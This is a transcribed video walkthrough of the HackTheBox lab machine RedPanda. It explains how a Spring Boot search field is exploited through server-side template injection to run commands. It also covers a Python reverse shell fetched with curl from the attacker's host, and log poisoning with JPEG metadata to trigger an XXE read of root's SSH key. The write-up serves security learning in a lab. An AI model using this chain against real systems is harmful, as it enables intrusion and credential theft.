I did redpanda from HackTheBox, and I must say, even though it's an easy box, HackTheBox are always doing the things to make you learn something new. That box was kind of fun because you have to combine different pieces of vulnerabilities and perform blind XXC. Like, to be honest, the first time I was doing blind XXC was just now. So you have timestamps down in the video to navigate it easier, and without further ado, let's dive into the box. Alright, we start with the box, of course, with Nmap, and I've already did that, so thank me later. And here we have two ports. First one is being, of course, the SSH, meaning that we have a Linux box, most likely, we have the Ubuntu version. Then we have the HTTP proxy 8080 port, and here I can't really see anything interesting besides made with Spring Boot. So we know now that that application is based on Spring Boot. I'm not sure about the web server, but I think it doesn't really matter. So let's navigate to it, and we see that nice red panda. So let's try to input something like that. Of course, I tested for like SQL injection, HTML injection, cross-site scripting and so on, and it didn't work. So what I decided is to test that thing for like fuzz it with special characters and seeing how that will behave. I prefer wfuzz for that. Of course, you guys can do it everything like intruder, fluff and so on, but I just prefer wfuzz. So in order to do that, we of course need to see how the parameter is being passed, so we know how to fuzz it. Now, by capturing the request with burp, we can see it uses post request to search, and the parameter is being passed as name. So in order to do that, we can go with wfuzz, like here, and let's create a file with special characters, with the word we want to fuzz with. So let's do vim cars.txt, and let's smash the keyboard, like that, like that, like that, like that. Alright, I think I'm ready. Now let's try and make that into a new line, because I think that's how it should be done in order to be parsed successfully, like that. And since we have that on new line, let's now go and do wfuzz with -h. We can see that we need the URL, which is gonna be that. Then we're gonna need the method is gonna be post, the date is gonna be name, and that's again from burp is gonna be equal to fuzz, and that's what we want to fuzz actually. And then word this is gonna be characters. I think that's it. I'm gonna let go of intruder because of burp, because I don't need it anymore. And let's observe the output. This is the first for every of the special characters, and we are mainly interested in the status code. So we have 500 here, which is for the curly braces, and then we have 500 here for the backward slash, for the plus, and the other curly braces. And I'm not sure why it bugs out from the plus and from the backward slash, but this is most likely an SSTI, because curly braces are used for like what's called templates. How that is working is that when a front end communicates with backend and it wants to display a dynamic data to the user, it uses templates, which are something like that, variable. And when the user input is not sanitized, you can mess up with that templates and inject your own. So that's what SSTI means, server-side template injection. Now, in order to verify that, we can try like 7 times 7, and we can see it did not work, but we can try many different payloads like that, 7 times 7. And now we saw it was calculated, but we have some kind of gibberish with it. Let's try with other payloads. So we'll try with the asterisk, and then 7 times 7, and finish the syntax, and now we have a clean execution. So now we can verify we have that SSTI vulnerable. Now let's go and do HackTheBox SSTI. I highly appreciate the work of these guys, highly recommend them. So not sure why my internet is so slow, but there we are. Now we have a set of payloads based on the programming language, framework and so on. For instance, we have the SSTI payloads for Java Standard Edition, and that's what we were testing so far. This one I believe is for .NET Razor and so on. But here, yeah, that's one for the Java Standard Basic Edition, yeah. and we want the Java Spring one, which is that one. And that one is directly engaging with command injection. So copy that, go here, paste that, and we can see we have a command injection. So let's try now and get a shell, shall we? In order to get a shell, let's first get along with what our environment has and supports. Of course, let's go with the command again, and this time instead of ID, I can go with which Python, nothing, but let's try which Python 3, and we can see we have Python 3. So my idea is to go for that. Of course, there can be like 100 ways of getting a shell, but I decided to go for Python. Now, when you search Python 3 reverse shell GitHub, I explicitly needed to be on Python 3. Let's try that one. Of course, you can go with payload over things or pentest monkey and try these shells, but I found that to be working. So we have a server. Of course, that's gonna be into the description, so you can get it from there. That's our server. So I'm gonna do vim server.py, and of course add paste, run that, and now do vim client.py. Now let's go to here and copy the client. Now let's do a little bit of modifications, because here it's requiring the user to type the actual IP and password, but we actually don't need that. So the host is gonna be simply 10.10.40.40, and then the port is gonna be, I believe, sticking with 443 is a good choice. So we're gonna specify the port to be 443 without quotes. That's an integer. Alright, so before testing things and shooting onto the wild, let's first try if they are actually working. So here I'm gonna do Python 3 server.py, and I think I need to edit that. So server.py and edit my port 443. I believe if not specifying the host, it's gonna listen to all interfaces, which is nice. So I'm gonna do server.py, and on the left hand side I'm gonna do Python 3 client.py, and looks like it works just fine. Alright, so I'm gonna restart the server. Come on. And what happened now? Address already in use, SN NLTP. It's not. Maybe Python has that strange error of occupying the threads and seeing it's used when it's not. I've used that before. I've seen that before when I was developing things in Python. It has pretty much the same behavior. So what worked back then is to actually wait for that a little bit of time, and it's gonna just be fine. We just need to wait a little bit for that to be unoccupied. So I'm gonna pause the video. I'm gonna quickly reset my box, because I'm not really seeing a port is being open. I can't really kill a process there. So I'm gonna restart my machine. I'm gonna pause the video and be right back. I didn't need to restart my box, because right when I clicked pause, it's magically started to work. Not sure why, but now it works. So what I'm gonna do now is to actually go here, and I'm gonna host a Python server. So Python 3 HTTP server 80, and now what I'm gonna do is to try and dynamically execute that. So curl HTTP 10.10.40.40, and then do like client.py, and I'm gonna pipe that to Python 3, and let's see what happens. Nothing. So what I believe, it was successfully, I could read it, but it was not executed, because I'm thinking that the pipeline is not getting parsed or executed. So what I'm going to do now is to download that. Now instead of piping that to Python 3, I'm going to output that into, let's say, temp and then c.py. Run that. It was downloaded successfully. Now let's do, instead of that, let's try Python 3 temp c.py. And there we are, we have our reverse shell. Now with that rights we have, it should be enough to go and get the root flag. So let's go to home, cd Pwning, and my shell broke up. Come on. Yep. Let's try that again. So Python 3. Alright. And nothing. I'm not sure what broke exactly. Python 3. Temp c.py. Oh, there we are. Alright. Let's go to cd home. Let's cd into Pwning. And there it is, the flag. So we have user. Now let's proceed to root. Now when it comes to previous, I tried many things like running limpies and so on, but wasn't able to find anything juicy. Of course, the newest version of limpies is saying that the sudo is vulnerable. It can be to that CV exploit, but I didn't test that because generally HackTheBox are like, the chances are they are not into kernel or sudo exploits, but they are into something twisted. So what I decided is to actually go for PSPy64. And what that is when you download and run that, it sees what the environment is doing, what process is being run, by who and what. So I can show you in action just to be more clear. The idea of that is to see if any cron jobs are actually working, if anything is being run on time basis, and that's pretty much it. So I want that PSPy64, so I'm gonna download that. Come on. Alright, I already have it, by the way. Nice. So I'm gonna copy it here. So cp downloads PSPy to here, and let's download that. So curl http 1010 4040 PSPy64 PSPy64 like that, and that should be here. Now let's go like chmod +x PSPy64 and do PSPy64. Alright, that should be it now. So we now have to wait a little bit to see if any cron jobs are actually being implemented. So I'm gonna pause the video real quick so I don't need to waste more time, and when I have an output about that, I'm gonna come back and let you know, guys, what that thing found. Alright, since my shell break, I decided to go for a more stable shell. So let's go and type pty shells github. Now go with, I'm not sure if it was that one or that one, so let's see them both. Or maybe they are the same thing. Yeah, they are. So here we have two files, which is being python pty backconnect, which is our reverse shell command line. So let's run that and copy that actually, and do like beam, that's backconnect. Yeah, that's like bc.py, and set paste and paste that. Now of course modify the host and the port, so that needs to be 1010 4040, and that needs to be 443. Now get rid of these and of these. That should be fine. Now I'm gonna go with downloading the next one. Now that's the backconnect. Now we need the handler. So TCP pty shell handler. This supports HTTP, UDP, and TCP, of course. So let's go with TCP pty shell handler. Go with row, copy that, vim handler.py, set paste that, and then do python 2, I believe should be handler.py, and then, or python 3 actually. Let's try with python 3 because the environment has python 3. 10 40 40 443, and that's it. Now let's go back to the targeted application, and let's try downloading another file. So curl http 1010 40 40, and that should be, what was the name, bc.py, and output that into temp bc.py. Run that, and we have it downloaded. Now let's try, instead of curling, let's try python 3 temp bc.py, run that, and we have an error in pty. So alright, let's try running that with python 2 actually. and let's run the exact same command. So Python 3 temp pc .py, and there you are, we have shell. So the point is that we have an error because the both PTY back connects are based on Python 2, and the client only supports Python 3, it has installed. But as you can see, we are fine now. When I run the server as Python 2 and the client application is Python 3, it magically worked. Now that shell, I really like it because I can go with temp. I have cd temp. I have tap out complete, so I can do cat p and tap, and you can see it that way. Now let's try the ps thing. So ps by 64, run that, and now we have output. Nice. Now let's wait a little bit. I'm gonna pause the video again because now I know we have nice out. Actually, let's try to analyze that if that's not here. So we have the PSPy. That's our UID. We are interested in root UIDs. So it's not in here so far. So I'm gonna pause the video real quick and be right back as soon as I hit something. Alright, we are back, and we can see that UID 0, which is mean root actually, is running some kind of Java application, Java jar, opt, credit score, walk parser, final, target something, and final jar with dependency jar. Alright, so let's go into that directory, walk parser, and since it's running Java jar file, the chances are that the source code should be there and it's compiled into jar. So let's do Ctrl+C, and the fanciest part about that shell is that when you run Ctrl+C, the terminal is not breaking, so that's amazing. Now let's go to opt, credit score, and walk parser, cd final, and I think the source code should be in like crc, and then main, then java, then com. I had that Java structures there, then walk parser, and there we are, we have app.java. So let's try to analyze the source code and seeing how that thing really works, and can we really exploit that. Alright, so what I did is I copied the code and opened that with code application so we can browse and navigate it easier. So let's start with the code review of that thing. And I want to explain how I review code, and I hope you learn something new from it. So the first thing I see are the libraries that have been used, because the whole code down there is based on the libraries being used. So if we use file, we're going to work with files. If we're going to see JDOM, for example, we're going to use with XML, because JDOM is indeed XML parser for Java. So the libraries are HashMap, file writer. Then we have JPEG metadata reader. We're gonna work with images, XMLs, and files, and the JDOM thing there. Nice. So what I tried and like most doing is starting from main, and whenever I see a function, I jump and make the reference dynamically. So let's start with the main. The first line, file walkfd, is new file, so we open that one out. Then scanner walk reader is gonna use scan, so we're gonna open that file in scanner, and while has next line, so we're gonna open that file as a like in Java, and until it has lines, we're gonna do these actions. Right, the first action is gonna get the line, so we are working with the file one line by one line. We're gonna get the line, and we're gonna see if that's an image, which is image in that case is doing. If the file name contains JPEG, it's returning true or false. So if that thing returns false, we're gonna continue and jump over the next iteration. So if there's no image here, these things are not getting executed. But if there is an image here, that means that JPEG, the next things are getting executed. The line 103 is doing a hash map, so map parse data is equal parse walk. And if we go to that parse walk there, we can see it using a hash map, and it splits the file based on 2 slashes, then uses a new hash map, and in that hash map it defines 4 variable status code, IP, user agent, and URI based on the parse. So most likely from that output we can see that we are working with a walk file based on that Panda application. So here I can go with cd opt and then panda search, and there it is, the walk file, redpanda.walk. And now if I go here and do something like asd and then cat panda walk again, we can see the walk file is being populated, and we parse based on these two pipelines. So we have, there is the user agent, there is the status code, there is the IP, there is the user agent, and the URI, which in that case is missing. Oh no, it's not, it's /search. So that's pretty much doing parse walk, and it returns the map. The next line is printing out the URI, and then artist is get artist parse data get URI to string. So in the URI we are getting the artist, and the artist thing there is using that JPEG metadata reader. It opens the JPEG file, and in that JPEG file it searches for a tag artist. So that's our injection point, because if we can poison the walk file into look for our custom JPEG file which have our custom artist tag there, we can force that to execute XML. And you may ask how that's gonna execute XML. Well, in the next line we have the XML part is gonna be credits artist and artist from our previous one, and credits.xml, and we have add view to method, which is gonna do create indeed a new XML file. So our XML file, which we specify, is gonna get parsed through the XML engine of that Java library and hopefully get executed. I know it sounds like a little bit of confusing, but bear with me. Now let's get into the execution point of view, and I hope that makes more sense when I see that in action. So let's go and do that. Alright, I have reset the box because I'm not sure why until recording it was broken up, but never mind, I reset it, and now it's time for pre-risk. Now what happens here is that we need to perform a bunch of steps, because based on our source code we need to first create an XML file which we're gonna store our payload for getting like sensitive content. Then we're gonna can create a JPEG file which we can use pretty much any JPEG out there, and we can poison its metadata, because here on that method right here on the where are you, here we can see that it's using JPEG metadata reader and it's reading the metadata artist. So we can point the artist to point to XML file, which then can get executed. I know it's kind of strange, so bear with me. First one is to create, as I said, my test XML file. So I'm gonna do vim test creds.xml, and it should end in that creds XML syntax in order for the attack to work, but that test can be anything. So I'm gonna create a new one, and I have my own scrambled from main examples, so I'm just gonna copy and paste it right away like that. And of course you can use many XXC payloads like from here. All these links are gonna be in the description of my video, so we don't have to worry about that. And what that is doing, let me go through the XML file. This is just the valid XML syntax. Then we have doctype replace entity ent system, and we specify what file we want. And then we have like the valid XML tags like u closing tag and a closing tag a. This can be anything, guys. And between the a tags we have that ent with that syntax, which means after that file is getting executed and rendered and processed, ent is gonna become the file content of the file we specified there. So that's the main job, right? Now I save that file. Now we get a file on the remote server. In my case, that's that amazing like raccoon there, or bear, not sure what that is, but I'm getting the file with wget, and then I want to remove smooch to test.jpg, and I have the same naming convention. So I have test creds XML, and then I have test.jpg. And with exif2 I can inspect test.jpg and indeed see the artist is being wooden. Now I can do exif2 artist is equal to //temp test, and that's gonna point to the XML file I created. Now why I am not including the creds XML syntax? Because it's appended on the code side right here, and I do not need to include it, so it automatically populates on the runtime, right? So I have two files. We have test creds XML and we have test.jpg, which points to create.xml. All right, nice. So let's transfer that files to my victim. So let's do wget 1010 4040 test create.xml and xml. Nope. Let's do Python HTTP server creates XML. All right, I have it right. And then we get 1010 4040 and then do test.jpg. All right, so we have two files in order. Now the only thing left to do is to poison the walk file. We can either do this with curl or by manually writing to the walk file, since we are id walks. And if we go to opt panda search and we go lsla, we can see that panda walk is being owned by group walk, so we can edit the file, and that's my preferred way of doing that. Now, after creating like a normal request to the server and catting the redpanda walk, we can see the normal walk what it looks like. Like we have 200, then we have the IP, then we have the user agent, and then we have the URI. Now in that case, we need to modify the URI. So I'm gonna copy that whole walk there. I'm gonna go with echo and paste that, and then points to, what was it, redpanda.walk. And now here I need to edit the URI. So instead of /search, I want to do // and so on. So // all right, like that, test.jpg. all right, let me double check, that should be it. And now I need to run that command in order to poison the walk file. All right, so I think that we should have a single quote there, not a double. Yeah, maybe single quote or double quote. Maybe double works just fine. Yeah, both of them are doing the job, so that should be fine. And I missed something, then that's the directory. So I need to specify temp/test.jpg. all right, so I'm gonna copy that command right there, like that. Copy the command. Now go to my target machine, paste the command, and see cat redpanda walk, and we can see it's been poisoned. So now we have the status code, the IP, the standard walk as it should be, and then at the very last part we have .. and so on to temp test.jpg. If we see into temp, we can see both of the files. So the walk file is gonna point to test.jpg. Upon processing test.jpg is gonna read the metadata and proceed into parsing test creates.xml, and when that thing is getting parsed, we can get the root ID key. Whew. I think I've explained that well enough. So let me see if the walk has been already parsed. Cat opt panda walk, it is parsed. So if I cat test creates.xml, there we are, we can see the key. So the key was replaced into that ent variable right there. Whew, that was hell of a chain. I hope I explained that well enough. Of course, we can now just copy the key and sh into the box. Actually, let's show that to verify we did our job correctly. So I'm gonna do vim id rsa and do set paste that, and do chmod id rsa and sh to the root, and there we are. Of course, now we can go to cd root and get the flag. Whew, nice, amazing. Wow, that was the box. In my opinion, the previous is not easy, and it requires a lot of like thinking outside of the box, a lot of debugging, a lot of knowing how the code works. But as I said, that box taught me a lot of new things, and HackTheBox are always doing that. So I hope you enjoyed. I hope I explained the box well enough. If that's the case, hit the thumbs up button. If that's not the case, hit the thumbs down button. That's up to you guys. I hope you enjoyed, and I'm gonna see you right in the next one.